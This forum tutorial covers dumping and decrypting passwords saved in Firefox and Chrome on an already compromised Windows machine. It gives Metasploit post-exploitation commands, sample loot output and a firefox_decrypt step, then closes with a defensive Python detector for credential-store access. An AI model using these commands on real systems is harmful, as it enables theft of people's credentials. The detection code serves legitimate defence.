x32x01

ADMINISTRATOR
Retrieving stored passwords from web browsers like Mozilla Firefox and Google Chrome is part of the post-exploitation methodology. Attackers with backdoor access to a compromised computer can easily dump and decrypt credentials stored in web browsers.


Dumping Stored Mozilla Firefox Passwords

Mozilla Firefox's built-in password manager stores encrypted credentials in “logins.json”. The credentials in logins.json are encrypted with a key that is stored in the “key4.db” file. Both of these files are located in the following Windows directory.
Code:
%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

There’s a Metasploit (MSF) module which we’ll use to dump Firefox stored passwords on a compromised computer.

Module: firefox_creds
Code:
run post/multi/gather/firefox_creds


Code:
[+] Downloaded cert9.db: /root/.msf4/loot/20200927050238_default_10.10.78.147_ff.ljfn812a.cert_254315.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20200927050241_default_10.10.78.147_ff.ljfn812a.cook_800633.bin
[+] Downloaded key4.db: /root/.msf4/loot/20200927050253_default_10.10.78.147_ff.ljfn812a.key4_784345.bin
[+] Downloaded logins.json: /root/.msf4/loot/20200927050257_default_10.10.78.147_ff.ljfn812a.logi_176246.bin

This module has downloaded 4 files for us, but you can also download them manually.


These files have been renamed to .bin; just rename them back to their original extensions.


As you know, the credentials are encrypted, so now we have to decrypt them.

Decrypting Stored Passwords in Mozilla Firefox

Download firefox_decrypt to your local machine and run the script.
Code:
git clone https://github.com/unode/firefox_decrypt.git

There’s a manual on the GitHub repo you can follow. Let’s decrypt our credentials.
Code:
python firefox_decrypt.py /root/.msf4/loot


And there you go!

Dumping Stored Google Chrome Passwords

Google Chrome uses a Windows function called CryptProtectData to encrypt the passwords it stores on the computer with randomly generated keys. The database can be found in the directory below.
Code:
%LocalAppData%\Google\Chrome\User Data\Default\Login Data

There’s a Metasploit module available to dump stored credentials from the Chrome browser.

Module: enum_chrome
Code:
run post/windows/gather/enum_chrome

Decrypting Stored Passwords in Google Chrome

When the Metasploit module is used to retrieve credentials, it dumps .txt files that include a “Decrypted Data” column showing the decrypted passwords found in the Chrome browser.
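
From the defender's side, the files named above are what to watch: any process other than the browser opening logins.json, key4.db or Login Data is worth an alert. The following is an added example, not part of the original post; it assumes object-access auditing is enabled on those files so that Windows Security event 4663 is logged, that events are exported as JSON lines with `EventID`, `ProcessName` and `ObjectName` fields, and that the browsers sit in their default install paths.

```python
import json
import re

# Credential stores named in the post: Firefox logins.json/key4.db, Chrome "Login Data".
# The pattern matches on the path tail, so it works wherever the profile root lives.
STORE_RE = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db)$"
    r"|\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$",
    re.IGNORECASE,
)
# Assumption: default install paths. Full paths are compared, not file names,
# so a binary merely named chrome.exe in a temp directory is still reported.
EXPECTED = {
    r"c:\program files\mozilla firefox\firefox.exe",
    r"c:\program files\google\chrome\application\chrome.exe",
}

def suspicious_reads(lines):
    """Return (process, file) pairs where an unexpected process opened a store."""
    hits = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed records instead of aborting the scan
        if not isinstance(ev, dict) or ev.get("EventID") != 4663:
            continue
        obj, proc = ev.get("ObjectName", ""), ev.get("ProcessName", "")
        if STORE_RE.search(obj) and proc.lower() not in EXPECTED:
            hits.append((proc, obj))
    return hits

# Constructed sample events (not from the original post).
_FF = r"C:\Users\alice\AppData\Local\Mozilla\Firefox\Profiles\ab12cd34.Default"
_CH = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"
SAMPLE = [json.dumps({"EventID": 4663, "ProcessName": p, "ObjectName": o}) for p, o in [
    (r"C:\Program Files\Mozilla Firefox\firefox.exe", _FF + r"\logins.json"),
    (r"C:\Windows\Temp\svc.exe", _FF + r"\key4.db"),
    (r"C:\Users\alice\AppData\Local\Temp\chrome.exe", _CH),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe", _CH),
    (r"C:\Windows\System32\notepad.exe", r"C:\Users\alice\notes.txt"),
]] + ["{truncated record"]

if __name__ == "__main__":
    for proc, obj in suspicious_reads(SAMPLE):
        print(f"ALERT {proc} opened {obj}")
```

Backup agents and endpoint scanners that legitimately read these files would need to be added to the expected set to keep the alert volume usable.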
 